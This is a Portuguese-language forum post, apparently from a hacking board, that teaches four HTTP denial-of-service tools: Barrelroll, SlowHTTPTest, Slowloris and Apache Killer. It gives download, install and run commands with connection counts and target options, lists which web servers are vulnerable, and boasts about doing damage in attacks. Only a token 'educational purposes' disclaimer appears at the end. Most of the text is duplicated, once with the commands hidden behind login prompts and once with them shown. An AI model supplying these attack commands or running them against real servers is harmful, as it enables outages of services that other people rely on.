Como eu tenho muito tempo que não posto nada aqui, resolvir postar algumas ferramentas que eu venho usando e obtendo bons resultados com ataque de negação de serviço Denial of service.
Bom, pode ser que a maioria aqui já conheça 90% das ferramentas, pode ter certeza que tem gente também que não. É um tutorial básico, onde vou postar o download das ferramentas e eventualmente fazer um mini tutorial de como usa-las.
Vale ressaltar que todas foram testadas no linux por mim BT5, todas tive bom resultadonão significa que será da mesma forma com vocês, chega de conversa vamos lá.
Barrelroll: Pycurl DDoS Tool!
A Barrelroll realiza múltiplas conexões em um host utilizando múltiplos proxies.
Foi desenvolvida em Python. Foi lançada a pouco tempo e pode fazer um bom estrago em seus ataques...
COMO USAR:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Slowhttptest
SlowHTTPTest é uma ferramenta altamente configurável, que tem a capacidade de simular alguns ataques Layer Application DoS (Denial of Service).
Ela pode lidar com ate 64.000 conexões simultâneas, o que a torna super eficiente.
Vale lembrar que seu uso é exclusivo para testes em servidores APACHE.
COMO USAR
Para baixar e descompactar SlowHTTPTest:
Instalar:
Usar:
Slowloris HTTP DoS
O Slowloris é uma ferramenta de HTTP DoS desenvolvida pelo Rsnake. Seu funcionamento é bastante interessante porque ele cria sockets e envia requisições HTTPs válidas para a vitima continuamente em intervalos regulares, dessa forma ele tenta enganar o webserver evitando que estas conexões sejam fechadas.
No seu linux, vocês irão precisar executar o comando
COMO USAR
Depois de ter baixado o script, abra o terminal de digite:
Outros exemplos:
Slowloris faz evitar cache de apoio em uma base experimental com a opção de cache. Alguns servidores de cache pode olhar para a parte do caminho pedido do cabeçalho, mas enviando pedidos diferentes a cada vez que você pode abusar de mais recursos. A utilidade desta opção especial, não foi exaustivamente testado. Sua milhagem pode variar.
head3 HTTP Cache Exemplo:
Enviando mensagem para o servidor:
Sistemas afetados:
Apache 1.x
Apache 2.x
dhttpd
GoAhead WebServer
Squid
Servidores Web que isto não afeta:
IIS6.0
IIS7.0
lighttpd
nginx
Cherokee (verified by user community)
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Apache Killer
O Apache Killer foi uma vulnerabilidade divulgada no meio de agosto do ano passado que deixou muito administrador Web de cabelos em pé e não é para menos já que Apache corresponde em mais de 60% dos servidores HTTP que rodam na Internet.
COMO USAR:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Adicionem a linha
#!/usr/bin/perl
logo no início do script.
No seu linux, vocês irão precisar executar o comando:
Bom é isso ai, não saiam atacando servidores aleatorios que vocês podem ser presos...Não me responsabiliz pelo mau uso das ferramentas. Esse tutorial foi feito para fins educativos. OBRIGADO!
USEM LINUX!
Bom, pode ser que a maioria aqui já conheça 90% das ferramentas, pode ter certeza que tem gente também que não. É um tutorial básico, onde vou postar o download das ferramentas e eventualmente fazer um mini tutorial de como usa-las.
Vale ressaltar que todas foram testadas no linux por mim BT5, todas tive bom resultadonão significa que será da mesma forma com vocês, chega de conversa vamos lá.
Barrelroll: Pycurl DDoS Tool!
A Barrelroll realiza múltiplas conexões em um host utilizando múltiplos proxies.
Foi desenvolvida em Python. Foi lançada a pouco tempo e pode fazer um bom estrago em seus ataques...
COMO USAR:
Código:
./barrelroll.py IPAQUI exemplo.com 50 < proxies/list1.txt
Slowhttptest
SlowHTTPTest é uma ferramenta altamente configurável, que tem a capacidade de simular alguns ataques Layer Application DoS (Denial of Service).
Ela pode lidar com ate 64.000 conexões simultâneas, o que a torna super eficiente.
Vale lembrar que seu uso é exclusivo para testes em servidores APACHE.
COMO USAR
Para baixar e descompactar SlowHTTPTest:
Código:
wget http://slowhttptest.googlecode.com/files/slowhttptest-1.4.tar.gz gunzip slowhttptest-1.4.tar.gz tar xf slowhttptest-1.4.tar.gz cd slowhttptest-1.4
Código:
./configure make make install
Código:
slowhttptest -c 1000 -B -g -o output-file-name -i 100 -r 300 -s 10240 -u http://www.example.com/url/page.html -x 20
O Slowloris é uma ferramenta de HTTP DoS desenvolvida pelo Rsnake. Seu funcionamento é bastante interessante porque ele cria sockets e envia requisições HTTPs válidas para a vitima continuamente em intervalos regulares, dessa forma ele tenta enganar o webserver evitando que estas conexões sejam fechadas.
No seu linux, vocês irão precisar executar o comando
Código:
cpan Parallel::ForkManager
Depois de ter baixado o script, abra o terminal de digite:
Código:
perl slowloris.pl -dns example.com
Slowloris faz evitar cache de apoio em uma base experimental com a opção de cache. Alguns servidores de cache pode olhar para a parte do caminho pedido do cabeçalho, mas enviando pedidos diferentes a cada vez que você pode abusar de mais recursos. A utilidade desta opção especial, não foi exaustivamente testado. Sua milhagem pode variar.
head3 HTTP Cache Exemplo:
Código:
./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache
Código:
./slowloris.pl -dns www.example.com -port 80 -test
Apache 1.x
Apache 2.x
dhttpd
GoAhead WebServer
Squid
Servidores Web que isto não afeta:
IIS6.0
IIS7.0
lighttpd
nginx
Cherokee (verified by user community)
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Apache Killer
O Apache Killer foi uma vulnerabilidade divulgada no meio de agosto do ano passado que deixou muito administrador Web de cabelos em pé e não é para menos já que Apache corresponde em mais de 60% dos servidores HTTP que rodam na Internet.
COMO USAR:
Código:
perl killapache.pl www.example.com 50
Adicionem a linha
#!/usr/bin/perl
logo no início do script.
No seu linux, vocês irão precisar executar o comando:
Código:
cpan Parallel::ForkManager
USEM LINUX!
Comment